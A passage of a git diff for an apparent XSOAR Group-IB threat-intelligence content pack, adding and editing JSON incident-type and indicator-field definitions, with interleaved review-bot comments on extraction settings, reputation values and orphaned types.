+ "default": false,
+ "detached": false,
+ "disabled": false,
+ "extractSettings": {
+ "fieldCliNameToExtractSettings": {
+ "gibrelatedindicatorsdata": {
+ "extractAsIsIndicatorTypeId": "",
+ "extractIndicatorTypesIDs": [],
+ "isExtractingAllIndicatorTypes": true
+ }
+ },
+ "mode": "Specific"
+ },
+ "hours": 0,
+ "hoursR": 0,
+ "id": "GIB Cybercriminal Threat Actor",
+ "layout": "GIB Cybercriminal Threat Actor Layout",
+ "locked": false,
+ "name": "GIB Cybercriminal Threat Actor",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
+ "readonly": false,
+ "reputationCalc": 0,
+ "system": false,
+ "version": -1,
+ "weeks": 0,
+ "weeksR": 0,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Data_Breach.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Data_Breach.json
index 2b7d5db1e306..8c91f6f62df2 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Data_Breach.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Data_Breach.json
@@ -7,7 +7,13 @@
 "detached": false,
 "disabled": false,
 "extractSettings": {
- "fieldCliNameToExtractSettings": {},
+ "fieldCliNameToExtractSettings": {
+ "gibrelatedindicatorsdata": {
+ "extractAsIsIndicatorTypeId": "",
+ "extractIndicatorTypesIDs": [],
+ "isExtractingAllIndicatorTypes": true
+ }
+ },
 "mode": "Specific"
 },
 "hours": 0,
@@ -16,10 +22,10 @@
 "layout": "GIB Data Breach Layout",
 "locked": false,
 "name": "GIB Data Breach",
- "onChangeRepAlg": 1,
- "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence & Attribution",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
 "readonly": false,
- "reputationCalc": 1,
+ "reputationCalc": 0,
 "system": false,
 "version": -1,
 "weeks": 0,
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Malware.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Malware.json
new file mode 100644
index 000000000000..51dc061eca64
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Malware.json
@@ -0,0 +1,34 @@
+{
+ "autorun": false,
+ "color": "#4B897A",
+ "days": 0,
+ "daysR": 0,
+ "default": false,
+ "detached": false,
+ "disabled": false,
+ "extractSettings": {
+ "fieldCliNameToExtractSettings": {
+ "gibrelatedindicatorsdata": {
+ "extractAsIsIndicatorTypeId": "",
+ "extractIndicatorTypesIDs": [],
+ "isExtractingAllIndicatorTypes": true
+ }
+ },
+ "mode": "Specific"
+ },
+ "hours": 0,
+ "hoursR": 0,
+ "id": "GIB Malware",
+ "layout": "GIB Malware Layout",
+ "locked": false,
+ "name": "GIB Malware",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
+ "readonly": false,
+ "reputationCalc": 0,
+ "system": false,
+ "version": -1,
+ "weeks": 0,
+ "weeksR": 0,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Malware_CNC.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Malware_CNC.json
new file mode 100644
index 000000000000..f3cbc21932ad
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Malware_CNC.json
@@ -0,0 +1,36 @@
+{
+ "id": "GIB Malware CNC",
+ "version": -1,
+ "vcShouldIgnore": false,
+ "locked": false,
+ "name": "GIB Malware CNC",
+ "prevName": "GIB Malware CNC",
+ "color": "#00E5FF",
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
+ "hours": 0,
+ "days": 0,
+ "weeks": 0,
+ "hoursR": 0,
+ "daysR": 0,
+ "weeksR": 0,
+ "system": false,
+ "readonly": false,
+ "default": false,
+ "autorun": false,
+ "disabled": false,
+ "reputationCalc": 0,
+ "onChangeRepAlg": 0,
+ "layout": "GIB Malware CNC Layout",
+ "detached": false,
+ "extractSettings": {
+ "mode": "Specific",
+ "fieldCliNameToExtractSettings": {
+ "gibrelatedindicatorsdata": {
+ "extractAsIsIndicatorTypeId": "",
+ "isExtractingAllIndicatorTypes": true,
+ "extractIndicatorTypesIDs": []
+ }
+ }
+ },
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Nation-State_Cybercriminals_Threat.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Nation-State_Cybercriminals_Threat.json
new file mode 100644
index 000000000000..1ea511d6341e
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Nation-State_Cybercriminals_Threat.json
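Review bot: `incidenttype-GIB_Malware_CNC.json` is laid out differently from every other incident type in this commit: its keys are in raw export order instead of the sorted order the sibling files use, and it carries `"vcShouldIgnore": false` and `"prevName": "GIB Malware CNC"`, which none of the other new types include. That reads like a server export that skipped the normalization pass applied to the rest; running it through the same formatter so it matches, for example, the Nation-State type in the next hunk would keep the pack uniform and make future diffs of this file meaningful. The values themselves are consistent with the siblings (`autorun` false, both reputation keys 0, extraction limited to `gibrelatedindicatorsdata`), so this is a style point only.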
@@ -0,0 +1,34 @@
+{
+ "autorun": false,
+ "color": "#AA00FF",
+ "days": 0,
+ "daysR": 0,
+ "default": false,
+ "detached": false,
+ "disabled": false,
+ "extractSettings": {
+ "fieldCliNameToExtractSettings": {
+ "gibrelatedindicatorsdata": {
+ "extractAsIsIndicatorTypeId": "",
+ "extractIndicatorTypesIDs": [],
+ "isExtractingAllIndicatorTypes": true
+ }
+ },
+ "mode": "Specific"
+ },
+ "hours": 0,
+ "hoursR": 0,
+ "id": "GIB Nation-State Cybercriminals Threat",
+ "layout": "GIB Nation-State Cybercriminals Threat Layout",
+ "locked": false,
+ "name": "GIB Nation-State Cybercriminals Threat",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
+ "readonly": false,
+ "reputationCalc": 0,
+ "system": false,
+ "version": -1,
+ "weeks": 0,
+ "weeksR": 0,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Nation-State_Cybercriminals_Threat_Actor.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Nation-State_Cybercriminals_Threat_Actor.json
new file mode 100644
index 000000000000..def87bf7b0e9
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Nation-State_Cybercriminals_Threat_Actor.json
@@ -0,0 +1,34 @@
+{
+ "autorun": false,
+ "color": "#AA00FF",
+ "days": 0,
+ "daysR": 0,
+ "default": false,
+ "detached": false,
+ "disabled": false,
+ "extractSettings": {
+ "fieldCliNameToExtractSettings": {
+ "gibrelatedindicatorsdata": {
+ "extractAsIsIndicatorTypeId": "",
+ "extractIndicatorTypesIDs": [],
+ "isExtractingAllIndicatorTypes": true
+ }
+ },
+ "mode": "Specific"
+ },
+ "hours": 0,
+ "hoursR": 0,
+ "id": "GIB Nation-State Cybercriminals Threat Actor",
+ "layout": "GIB Nation-State Cybercriminals Threat Actor Layout",
+ "locked": false,
+ "name": "GIB Nation-State Cybercriminals Threat Actor",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
+ "readonly": false,
+ "reputationCalc": 0,
+ "system": false,
+ "version": -1,
+ "weeks": 0,
+ "weeksR": 0,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Git_Leak.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Git_Leak.json
index 0cadfedf15cd..19eb85315a7b 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Git_Leak.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Git_Leak.json
@@ -7,8 +7,14 @@
 "detached": false,
 "disabled": false,
 "extractSettings": {
- "fieldCliNameToExtractSettings": {},
- "mode": "All"
+ "fieldCliNameToExtractSettings": {
+ "gibrelatedindicatorsdata": {
+ "extractAsIsIndicatorTypeId": "",
+ "extractIndicatorTypesIDs": [],
+ "isExtractingAllIndicatorTypes": true
+ }
+ },
+ "mode": "Specific"
 },
 "hours": 0,
 "hoursR": 0,
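Review bot: Switching `GIB OSI Git Leak` from `"mode": "All"` to `"mode": "Specific"` with only `gibrelatedindicatorsdata` listed means indicators stop being extracted from any other field of these leak incidents; the same `All` to `Specific` change is made for `GIB OSI Public Leak` on the next line. Whether `gibrelatedindicatorsdata` is actually associated with the two OSI leak types is not visible in this chunk, and if it is not, indicator extraction for them silently becomes a no-op. A sentence in the PR description on why auto-extraction was narrowed, and a confirmation that the mapper populates that field for leak incidents, would let operators judge the detection impact before upgrading. The enclosing object continues outside the hunk.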
@@ -16,10 +22,10 @@
 "layout": "GIB OSI Git Leak Layout",
 "locked": false,
 "name": "GIB OSI Git Leak",
- "onChangeRepAlg": 1,
- "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence & Attribution",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
 "readonly": false,
- "reputationCalc": 1,
+ "reputationCalc": 0,
 "system": false,
 "version": -1,
 "weeks": 0,
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Public_Leak.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Public_Leak.json
index 7bc385ed374f..b02072bc0119 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Public_Leak.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Public_Leak.json
@@ -7,8 +7,14 @@
 "detached": false,
 "disabled": false,
 "extractSettings": {
- "fieldCliNameToExtractSettings": {},
- "mode": "All"
+ "fieldCliNameToExtractSettings": {
+ "gibrelatedindicatorsdata": {
+ "extractAsIsIndicatorTypeId": "",
+ "extractIndicatorTypesIDs": [],
+ "isExtractingAllIndicatorTypes": true
+ }
+ },
+ "mode": "Specific"
 },
 "hours": 0,
 "hoursR": 0,
@@ -16,10 +22,10 @@
 "layout": "GIB OSI Public Leak Layout",
 "locked": false,
 "name": "GIB OSI Public Leak",
- "onChangeRepAlg": 1,
- "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence & Attribution",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
 "readonly": false,
- "reputationCalc": 1,
+ "reputationCalc": 0,
 "system": false,
 "version": -1,
 "weeks": 0,
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Vulnerability.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Vulnerability.json
new file mode 100644
index 000000000000..11314b208f96
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Vulnerability.json
@@ -0,0 +1,34 @@
+{
+ "autorun": false,
+ "color": "#7D28A7",
+ "days": 0,
+ "daysR": 0,
+ "default": false,
+ "detached": false,
+ "disabled": false,
+ "extractSettings": {
+ "fieldCliNameToExtractSettings": {
+ "gibrelatedindicatorsdata": {
+ "extractAsIsIndicatorTypeId": "",
+ "extractIndicatorTypesIDs": [],
+ "isExtractingAllIndicatorTypes": true
+ }
+ },
+ "mode": "Specific"
+ },
+ "hours": 0,
+ "hoursR": 0,
+ "id": "GIB OSI Vulnerability",
+ "layout": "GIB OSI Vulnerability Layout",
+ "locked": false,
+ "name": "GIB OSI Vulnerability",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
+ "readonly": false,
+ "reputationCalc": 0,
+ "system": false,
+ "version": -1,
+ "weeks": 0,
+ "weeksR": 0,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Open_Proxy.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Open_Proxy.json
new file mode 100644
index 000000000000..6e7108fadb70
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Open_Proxy.json
@@ -0,0 +1,34 @@
+{
+ "autorun": false,
+ "color": "#69A536",
+ "days": 0,
+ "daysR": 0,
+ "default": false,
+ "detached": false,
+ "disabled": false,
+ "extractSettings": {
+ "fieldCliNameToExtractSettings": {
+ "gibrelatedindicatorsdata": {
+ "extractAsIsIndicatorTypeId": "",
+ "extractIndicatorTypesIDs": [],
+ "isExtractingAllIndicatorTypes": true
+ }
+ },
+ "mode": "Specific"
+ },
+ "hours": 0,
+ "hoursR": 0,
+ "id": "GIB Suspicious IP Open Proxy",
+ "layout": "GIB Suspicious IP Open Proxy Layout",
+ "locked": false,
+ "name": "GIB Suspicious IP Open Proxy",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
+ "readonly": false,
+ "reputationCalc": 0,
+ "system": false,
+ "version": -1,
+ "weeks": 0,
+ "weeksR": 0,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Scanner.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Scanner.json
new file mode 100644
index 000000000000..a3fa20be0ac6
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Scanner.json
@@ -0,0 +1,34 @@
+{
+ "autorun": false,
+ "color": "#AA00FF",
+ "days": 0,
+ "daysR": 0,
+ "default": false,
+ "detached": false,
+ "disabled": false,
+ "extractSettings": {
+ "fieldCliNameToExtractSettings": {
+ "gibrelatedindicatorsdata": {
+ "extractAsIsIndicatorTypeId": "",
+ "extractIndicatorTypesIDs": [],
+ "isExtractingAllIndicatorTypes": true
+ }
+ },
+ "mode": "Specific"
+ },
+ "hours": 0,
+ "hoursR": 0,
+ "id": "GIB Suspicious IP Scanner",
+ "layout": "GIB Suspicious IP Scanner Layout",
+ "locked": false,
+ "name": "GIB Suspicious IP Scanner",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
+ "readonly": false,
+ "reputationCalc": 0,
+ "system": false,
+ "version": -1,
+ "weeks": 0,
+ "weeksR": 0,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Socks_Proxy.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Socks_Proxy.json
new file mode 100644
index 000000000000..36d99028b73a
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Socks_Proxy.json
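Review bot: All five new Suspicious IP types (this Scanner file and the Open Proxy, Socks Proxy, TOR Node and VPN files around it) ship with `"reputationCalc": 0` and `"onChangeRepAlg": 0`, so the IPs extracted from `gibrelatedindicatorsdata` carry only whatever verdict the integration itself writes on the indicator and nothing from the incident type; the pack should say so, because an operator who expects "suspicious IP" incidents to produce suspicious indicators will otherwise wonder why the verdict is empty. I read 0 as "do not set reputation" in the XSOAR incident-type schema — worth confirming. The choice is defensible and arguably safer for TOR exits and VPN egress, which are shared infrastructure and cause collateral blocking when auto-marked, but a one-line comment in the README such as `Suspicious IP incident types do not set indicator reputation on extraction; tune per type if you auto-block on verdict` would keep anyone from flipping all five to "malicious" uniformly.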
@@ -0,0 +1,34 @@
+{
+ "autorun": false,
+ "color": "#7D3D63",
+ "days": 0,
+ "daysR": 0,
+ "default": false,
+ "detached": false,
+ "disabled": false,
+ "extractSettings": {
+ "fieldCliNameToExtractSettings": {
+ "gibrelatedindicatorsdata": {
+ "extractAsIsIndicatorTypeId": "",
+ "extractIndicatorTypesIDs": [],
+ "isExtractingAllIndicatorTypes": true
+ }
+ },
+ "mode": "Specific"
+ },
+ "hours": 0,
+ "hoursR": 0,
+ "id": "GIB Suspicious IP Socks Proxy",
+ "layout": "GIB Suspicious IP Socks Proxy Layout",
+ "locked": false,
+ "name": "GIB Suspicious IP Socks Proxy",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
+ "readonly": false,
+ "reputationCalc": 0,
+ "system": false,
+ "version": -1,
+ "weeks": 0,
+ "weeksR": 0,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_TOR_Node.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_TOR_Node.json
new file mode 100644
index 000000000000..e0472eb49823
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_TOR_Node.json
@@ -0,0 +1,34 @@
+{
+ "autorun": false,
+ "color": "#7A7A7A",
+ "days": 0,
+ "daysR": 0,
+ "default": false,
+ "detached": false,
+ "disabled": false,
+ "extractSettings": {
+ "fieldCliNameToExtractSettings": {
+ "gibrelatedindicatorsdata": {
+ "extractAsIsIndicatorTypeId": "",
+ "extractIndicatorTypesIDs": [],
+ "isExtractingAllIndicatorTypes": true
+ }
+ },
+ "mode": "Specific"
+ },
+ "hours": 0,
+ "hoursR": 0,
+ "id": "GIB Suspicious IP TOR Node",
+ "layout": "GIB Suspicious IP TOR Node Layout",
+ "locked": false,
+ "name": "GIB Suspicious IP TOR Node",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
+ "readonly": false,
+ "reputationCalc": 0,
+ "system": false,
+ "version": -1,
+ "weeks": 0,
+ "weeksR": 0,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_VPN.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_VPN.json
new file mode 100644
index 000000000000..df9a0eaf04a5
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_VPN.json
@@ -0,0 +1,34 @@
+{
+ "autorun": false,
+ "color": "#AA00FF",
+ "days": 0,
+ "daysR": 0,
+ "default": false,
+ "detached": false,
+ "disabled": false,
+ "extractSettings": {
+ "fieldCliNameToExtractSettings": {
+ "gibrelatedindicatorsdata": {
+ "extractAsIsIndicatorTypeId": "",
+ "extractIndicatorTypesIDs": [],
+ "isExtractingAllIndicatorTypes": true
+ }
+ },
+ "mode": "Specific"
+ },
+ "hours": 0,
+ "hoursR": 0,
+ "id": "GIB Suspicious IP VPN",
+ "layout": "GIB Suspicious IP VPN Layout",
+ "locked": false,
+ "name": "GIB Suspicious IP VPN",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
+ "readonly": false,
+ "reputationCalc": 0,
+ "system": false,
+ "version": -1,
+ "weeks": 0,
+ "weeksR": 0,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Targeted_Malware.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Targeted_Malware.json
index 906eea67ba82..7052bed73cda 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Targeted_Malware.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Targeted_Malware.json
@@ -22,10 +22,10 @@
 "layout": "GIB Targeted Malware Layout",
 "locked": false,
 "name": "GIB Targeted Malware",
- "onChangeRepAlg": 2,
- "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence & Attribution",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
 "readonly": false,
- "reputationCalc": 2,
+ "reputationCalc": 0,
 "system": false,
 "version": -1,
 "weeks": 0,
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Admiralty_Code.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Admiralty_Code.json
index e42dd45a03ae..05d6e9f44d81 100644
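Review bot: The GIB Targeted Malware incident type is kept and only has its reputation settings zeroed (2 → 0 on both `onChangeRepAlg` and `reputationCalc`), yet the rewritten integration later in this patch drops `malware/targeted_malware` entirely — the removed `MAPPING` entry fed this type with File indicators from `md5`, and the new `PREFIXES`/`INDICATORS_TYPES` tables list only `malware/cnc` and `malware/malware`. Unless fetch-incidents still produces it through a path outside this chunk, the type is now orphaned, and a dead type with a classifier still pointing at it is confusing for operators. Either remove the incident type and its layout in the same change or add a comment in the pack notes explaining why it stays. The 2 → 0 change also silently drops the verdict the old type applied to the file hashes extracted from these incidents (2 being "mark as suspicious" if I read the schema correctly), which deserves its own release-note line.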
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Admiralty_Code.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Admiralty_Code.json
@@ -7,7 +7,6 @@
 "Email",
 "Domain",
 "GIB Compromised Mule",
- "GIB Compromised IMEI",
 "GIB Victim IP"
 ],
 "associatedToAll": false,
@@ -35,4 +34,4 @@
 "useAsKpi": false,
 "version": -1,
 "fromVersion": "6.0.0"
-}
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Collection.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Collection.json
index 337a23cead05..efbff3947c5d 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Collection.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Collection.json
@@ -7,7 +7,6 @@
 "Email",
 "Domain",
 "GIB Compromised Mule",
- "GIB Compromised IMEI",
 "GIB Victim IP"
 ],
 "associatedToAll": false,
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Credibility.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Credibility.json
index 2cb663a4befb..5917d42eac7d 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Credibility.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Credibility.json
@@ -7,7 +7,6 @@
 "Email",
 "Domain",
 "GIB Compromised Mule",
- "GIB Compromised IMEI",
 "GIB Victim IP"
 ],
 "associatedToAll": false,
@@ -35,4 +34,4 @@
 "useAsKpi": false,
 "version": -1,
 "fromVersion": "6.0.0"
-}
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Hash.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Hash.json
new file mode 100644
index 000000000000..ecc522f9d88c
--- /dev/null
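Review bot: `"GIB Compromised IMEI"` is dropped from `associatedTypes` here and in every other GIB indicator field in this patch, but `reputation-GIB_Compromised_IMEI.json` itself survives (it is only touched for a trailing newline further down) and `compromised/imei` disappears from the integration's `MAPPING` without reappearing in the new `PREFIXES`. That leaves an indicator type in the pack with no fields bound to it: IMEI indicators already present in a tenant keep their values, but the GIB Admiralty Code, Credibility, Reliability, Severity and ID columns stop rendering for them. If the collection is really retired, delete the indicator type in the same change and mention the removal in the release notes; if it is not, keep the association in these fields. The `-}`/`+}` hunk only strips the file's trailing newline and produces the same noise across the other indicator-field files — worth reverting so the diff shows only the intended change.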
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Hash.json
@@ -0,0 +1,30 @@
+{
+ "associatedToAll": true,
+ "caseInsensitive": true,
+ "cliName": "gibhash",
+ "closeForm": false,
+ "content": true,
+ "editForm": true,
+ "group": 2,
+ "hidden": false,
+ "id": "indicator_gibhash",
+ "isReadOnly": false,
+ "locked": false,
+ "name": "GIB Hash",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "propagationLabels": [
+ "all"
+ ],
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "threshold": 72,
+ "type": "shortText",
+ "unmapped": false,
+ "unsearchable": true,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_ID.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_ID.json
index 8eaa56794718..77a7d78b9164 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_ID.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_ID.json
@@ -7,7 +7,6 @@
 "Email",
 "Domain",
 "GIB Compromised Mule",
- "GIB Compromised IMEI",
 "GIB Victim IP"
 ],
 "associatedToAll": false,
@@ -15,7 +14,7 @@
 "cliName": "gibid",
 "closeForm": false,
 "content": true,
- "description": "ID of event in GIB TI&A",
+ "description": "ID of event in GIB TI\u0026A",
 "editForm": true,
 "group": 2,
 "hidden": false,
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Malware_Name.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Malware_Name.json
index d6a74c0ffc41..bc912699d399 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Malware_Name.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Malware_Name.json
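Review bot: This file defines a `GIB Hash` indicator *field* (`cliName: gibhash`), while the integration's `INDICATORS_TYPES` later in the patch maps the `osi/git_repository` `hash` value to an indicator *type* that is also called `GIB Hash`; those are different XSOAR objects, and no `IndicatorTypes/reputation-GIB_Hash.json` is visible in this chunk, so please confirm the type definition exists in the pack before git-leak hashes are created under it. Two settings here also look broader than the value warrants: `"associatedToAll": true` attaches the field to every indicator type in the tenant even though only Git Leak data populates it, and `"unsearchable": true` means analysts cannot pivot on the hash from the indicator search. A tighter binding would be `"associatedToAll": false` with `"associatedTypes": ["GIB Hash"]` (or the File type, if the value is a content hash rather than a repository identifier), and `unsearchable` should be a deliberate choice noted in the pack README.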
@@ -4,7 +4,6 @@
 "URL",
 "Domain",
 "GIB Compromised Mule",
- "GIB Compromised IMEI",
 "GIB Victim IP"
 ],
 "associatedToAll": false,
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Proxy_Anonymous.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Proxy_Anonymous.json
index dd7470d41c7a..a58c047494be 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Proxy_Anonymous.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Proxy_Anonymous.json
@@ -1,5 +1,5 @@
 {
- "associatedTypes": [
+ "associatedTypes": [
 "IP"
 ],
 "associatedToAll": false,
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Reliability.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Reliability.json
index 424ca24ea650..4826ab67cdf6 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Reliability.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Reliability.json
@@ -7,7 +7,6 @@
